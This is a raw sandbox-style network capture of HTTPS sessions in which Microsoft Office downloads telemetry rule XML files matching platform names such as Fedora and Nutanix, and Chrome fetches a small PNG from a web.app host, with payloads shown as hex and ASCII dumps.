                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                x-ms-request-id: cb78c1b2-201e-003f-2e04-176d94000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144201Z-1657d5bbd48xdq5dkwwugdpzr000000002e000000000axqu
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                78192.168.2.649813199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC383OUTGET /b45b49df5eed87c4c880c5880c8b4f1f.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Etag: "7edb70bd3ab8a8a32582d99129e3eac01dadd9c5b55c8ae2867ea5e2997e1a56"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                X-Timer: S1728225722.874970,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC416INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 03 00 00 00 44 a4 8a c6 00 00 00 51 50 4c 54 45 ff 9e 03 ff 9d 01 ff a7 18 ff c4 57 ff c4 57 ff cc 69 ff d3 7a ff d3 79 ff ac 22 ff b9 3f ff cf 71 ff ac 22 ff cb 69 ff c8 61 ff a3 0e ff a0 06 ff bf 4e ff ba 42 ff b0 2a ff b6 37 ff d1 78 ff de a3 ff d6 8e ff ff fd ff ef d1 ff e6 bb ff f7 e8 9c c9 a4 9f 00 00 00 0a 74 52 4e 53 85 3f ff ff 85 85 3f 85 85 85 95 92 09 4c 00 00 00 f4 49 44 41 54 38 cb a5 8f db 72 84 20 0c 40 b3 45 d7 15 b1 05 21 98 f0 ff 1f ba 41 d4 fa d0 c9 d8 d9 e3 70 4b 8e 21 c0 73 50 79 c2 90 54 06 18 ac ca 00 bd 2e f4 d0 3b 95 3b c2 ac d2 43 a7 0b 1d 74 46 e5 3f 82 f7 a6 7d e6 3a 44 f0 0d 63 33 22 e6 34 1b 7f a5 83 71 5b 1d d2 da 28 94 e7 8b 30 c2 18 42 98 b1 ac 85
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR DQPLTEWWizy"?q"iaNB*7xtRNS??LIDAT8r @E!ApK!sPyT.;;CtF?}:Dc3"4q[(0B


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                79192.168.2.64981413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:02 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144202Z-1657d5bbd48t66tjar5xuq22r8000000022000000000f38u
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                80192.168.2.64981613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:02 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144202Z-1657d5bbd48xlwdx82gahegw4000000002ag000000009ek1
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                81192.168.2.64981513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:02 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                x-ms-request-id: 04801829-801e-00ac-6301-17fd65000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144202Z-1657d5bbd48tnj6wmberkg2xy80000000280000000006crk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                82192.168.2.64981713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:02 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144202Z-1657d5bbd482krtfgrg72dfbtn00000001v000000000cn0c
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                83192.168.2.64981813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:02 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                x-ms-request-id: cde3aec9-601e-0084-63e5-166b3f000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144202Z-1657d5bbd48brl8we3nu8cxwgn00000002d000000000e56k
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:02 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                84192.168.2.64982013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd48lknvp09v995n79000000001tg000000006dc5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                85192.168.2.64982213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:03 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                x-ms-request-id: 938e68e0-901e-0029-0160-17274a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144203Z-1657d5bbd48f7nlxc7n5fnfzh000000001ug00000000422t
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
